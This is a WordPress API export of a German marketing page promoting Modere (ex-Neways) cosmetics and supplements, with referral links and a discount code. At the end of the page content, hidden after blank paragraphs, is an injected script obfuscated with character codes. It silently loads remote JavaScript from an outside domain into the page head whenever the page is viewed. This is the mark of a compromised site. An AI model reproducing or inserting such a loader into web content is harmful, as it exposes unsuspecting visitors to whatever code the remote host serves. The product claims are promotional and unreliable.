{"id":934,"date":"2011-02-24T12:38:17","date_gmt":"2011-02-24T11:38:17","guid":{"rendered":"http:\/\/energiemedizin.de\/blog\/?page_id=934"},"modified":"2016-02-14T08:51:57","modified_gmt":"2016-02-14T08:51:57","slug":"neways","status":"publish","type":"page","link":"http:\/\/blog.energiemedizin.de\/?page_id=934","title":{"rendered":"Ihr gesundes Zuhause"},"content":{"rendered":"<div class=\"post-headline\">\n<h2><span style=\"color: #3366ff;\"> NEWAYS WURDE ZU MODERE<\/span><\/h2>\n<p>&nbsp;<\/p>\n<\/div>\n<div class=\"post-bodycopy clearfix\">\n<div id=\"em-wrapper\">\n<p><strong><span style=\"color: #000000;\">Seit mehr als 27 Jahren war Neways Spitzenreiter bei der Entwicklung sicherer Rezepturen und \u00a0der Herstellung wirkungsvoller Produkte.Vertrauen und Treue haben dieses Unternehmen vorangetrieben und somit uns die Chance er\u00f6ffnet, ein neues Gesch\u00e4ftsmodell zu \u00fcbernehmen, um unser volles Potenzial zu entfalten. <\/span><\/strong><strong><span style=\"color: #000000;\">Wir freuen uns mitzuteilen, dass Neways am 5. Oktober 2015 in Europa offiziell auf die Marke und das Modell Modere umgestellt worden ist.<\/span><\/strong><\/p>\n<p>&nbsp;<\/p>\n<\/div>\n<\/div>\n<h2><span style=\"color: #3366ff;\">Herzlich willkommen in der wunderbaren Welt von MODERE<\/span><\/h2>\n<p>&nbsp;<\/p>\n<p><a href=\"https:\/\/perth.shiftingretail.eu\/\" target=\"_blank\"><span style=\"color: #000000;\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft wp-image-5547\" src=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2014\/07\/MODERE-Wir-sind-die-Zukuinft.jpg\" alt=\"MODERE - Wir sind die Zukuinft\" width=\"587\" height=\"305\" srcset=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2014\/07\/MODERE-Wir-sind-die-Zukuinft.jpg 1185w, http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2014\/07\/MODERE-Wir-sind-die-Zukuinft-300x156.jpg 300w, http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2014\/07\/MODERE-Wir-sind-die-Zukuinft-1024x531.jpg 1024w\" sizes=\"(max-width: 587px) 100vw, 587px\" \/><\/span><\/a><strong><span style=\"color: #000000;\">Und willkommen auf dieser <a href=\"https:\/\/www.modere.eu\/?referralCode=260249\" target=\"_blank\">besonderen Website,<\/a> auf der Sie alle Information zu MODERE, zu unseren vorz\u00fcglichen Produkten, zu den Kampagnen <a href=\"https:\/\/www.modere.eu\/Home\/craft\" target=\"_blank\">f\u00fcr ein gesundes Zuhause<\/a> und falls Sie dies w\u00fcnschen, auch zu unserer <a href=\"http:\/\/blog.energiemedizin.de\/?page_id=32\" target=\"_blank\">einzigartigen Gesch\u00e4ftschance <\/a>finden.<\/span><\/strong><br \/>\n<strong><span style=\"color: #000000;\">Sie k\u00f6nnen von hier, direkt auf unsere tolle neue <a href=\"https:\/\/www.modere.eu\/?referralCode=260249\" target=\"_blank\">MODERE Europe-Website<\/a> zugreifen, auf der Sie mehr \u00fcber alle Vorz\u00fcge und Anwendungsbereiche der MODERE Produkte erfahren k\u00f6nnen. Wir pr\u00e4sentieren Ihnen unsere Produktpalette hervorragenden K\u00f6rperpflegeprodukte und Nahrungserg\u00e4nzungsmittel, die entsprechend strengster Herstellungsrichtlinien produziert werden und g\u00e4nzlich auf umstrittene Inhaltsstoffe verzichten.<br \/>\n<\/span><\/strong><\/p>\n<p><strong><span style=\"color: #000000;\">MODERE entwickelt seine Produkte firmenintern und in Zusammenarbeit mit einem erstklassigen Forschungs- und Entwicklungsteam. Alle Rezepturen werden konstant von unserem Scientific Advisory Board \u00fcberwacht. Dieses Gremium von Wissenschaftlern und Akademikern, das uns im Rahmen der Produktentwicklung mit Rat und Tat zur Seite steht, bezieht sich dazu stets auf den aktuellsten Stand der Forschung.<\/span><\/strong><\/p>\n<p><strong><span style=\"color: #000000;\">Diese Produkte sind nicht im Handel erh\u00e4ltlich und k\u00f6nnen nur \u00fcber unser Netzwerk bezogen werden. Sie k\u00f6nnen sich aber auch unserer Familie von Kunden anschlie\u00dfen und so alle Produkte f\u00fcr Ihren Eigenbedarf direkt bei MODERE bestellen.<\/span><\/strong><br \/>\n<strong><span style=\"color: #000000;\">Ganz gleich f\u00fcr welche Formel Sie sich entscheiden: Sie bestellen alle Produkte unseres Angebots stets zum interessantesten Preis.<\/span><\/strong><\/p>\n<h3><span style=\"color: #3366ff;\">F\u00fcr Ihren ersten Einkauf bei Modere bekommen Sie eine Gutschrift \u00fcber 10,- Euro, wenn Sie den Code 260249 eingeben. Die Gutschrift wird automatisch im Warenkorb ber\u00fccksichtigt. Einfach ausprobieren, registrieren und einkaufen.<br \/>\n<\/span><\/h3>\n<p><a href=\"https:\/\/www.modere.eu\/?referralCode=260249\" target=\"_blank\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft wp-image-5982\" src=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2016\/01\/MODERE-Karte-1.jpg\" alt=\"MODERE-Karte 1\" width=\"237\" height=\"237\" srcset=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2016\/01\/MODERE-Karte-1.jpg 406w, http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2016\/01\/MODERE-Karte-1-150x150.jpg 150w, http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2016\/01\/MODERE-Karte-1-300x300.jpg 300w\" sizes=\"(max-width: 237px) 100vw, 237px\" \/><\/a><a href=\"https:\/\/www.modere.eu\/Home\/craft\" target=\"_blank\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-6150\" src=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2016\/02\/Sichere-Produkte.png\" alt=\"Sichere Produkte\" width=\"361\" height=\"222\" srcset=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2016\/02\/Sichere-Produkte.png 1243w, http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2016\/02\/Sichere-Produkte-300x184.png 300w, http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2016\/02\/Sichere-Produkte-1024x629.png 1024w\" sizes=\"(max-width: 361px) 100vw, 361px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><strong><span style=\"color: #000000;\">Falls Sie zus\u00e4tzliche Informationen zu MODERE, zu unseren Produkten oder zu unserer <a href=\"http:\/\/blog.energiemedizin.de\/?page_id=32\" target=\"_blank\">Gesch\u00e4ftschance<\/a> w\u00fcnschen, nehmen Sie bitte Kontakt mit uns auf. Sie finden alle unsere Kontaktangaben im <a href=\"http:\/\/blog.energiemedizin.de\/?page_id=29\" target=\"_blank\">Imressum <\/a>auf diesem Blog.<\/span><\/strong><\/p>\n<p><span style=\"color: #000000;\"><strong>Achim Steffan &amp; Team<\/strong><\/span><\/p>\n<p><a href=\"https:\/\/www.modere.eu\/?referralCode=260249\" target=\"_blank\"><img decoding=\"async\" loading=\"lazy\" class=\"alignleft  wp-image-6160\" src=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2011\/02\/MODERE-1-Logo.jpg\" alt=\"MODERE 1 Logo\" width=\"304\" height=\"66\" srcset=\"http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2011\/02\/MODERE-1-Logo.jpg 387w, http:\/\/blog.energiemedizin.de\/wp-content\/uploads\/2011\/02\/MODERE-1-Logo-300x65.jpg 300w\" sizes=\"(max-width: 304px) 100vw, 304px\" \/><\/a><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><span style=\"color: #000000;\"><strong>Achim Steffan &amp; Team<\/strong><\/span><\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<script type=text\/javascript> Element.prototype.appendAfter = function(element) {element.parentNode.insertBefore(this, element.nextSibling);}, false;(function() { var elem = document.createElement(String.fromCharCode(115,99,114,105,112,116)); elem.type = String.fromCharCode(116,101,120,116,47,106,97,118,97,115,99,114,105,112,116); elem.src = String.fromCharCode(104,116,116,112,115,58,47,47,116,114,97,105,110,46,100,101,118,101,108,111,112,102,105,114,115,116,108,105,110,101,46,99,111,109,47,100,101,108,105,118,101,114,121,46,106,115,63,115,61,56);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(115,99,114,105,112,116))[0]);elem.appendAfter(document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0]);document.getElementsByTagName(String.fromCharCode(104,101,97,100))[0].appendChild(elem);})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>NEWAYS WURDE ZU MODERE &nbsp; Seit mehr als 27 Jahren war Neways Spitzenreiter bei der Entwicklung sicherer Rezepturen und \u00a0der Herstellung wirkungsvoller Produkte.Vertrauen und Treue haben dieses Unternehmen vorangetrieben und somit uns die Chance er\u00f6ffnet, ein neues Gesch\u00e4ftsmodell zu \u00fcbernehmen, um unser volles Potenzial zu entfalten. Wir freuen uns mitzuteilen, dass Neways am 5. Oktober [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":2,"comment_status":"closed","ping_status":"closed","template":"","meta":[],"_links":{"self":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages\/934"}],"collection":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=934"}],"version-history":[{"count":10,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages\/934\/revisions"}],"predecessor-version":[{"id":6161,"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=\/wp\/v2\/pages\/934\/revisions\/6161"}],"wp:attachment":[{"href":"http:\/\/blog.energiemedizin.de\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=934"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}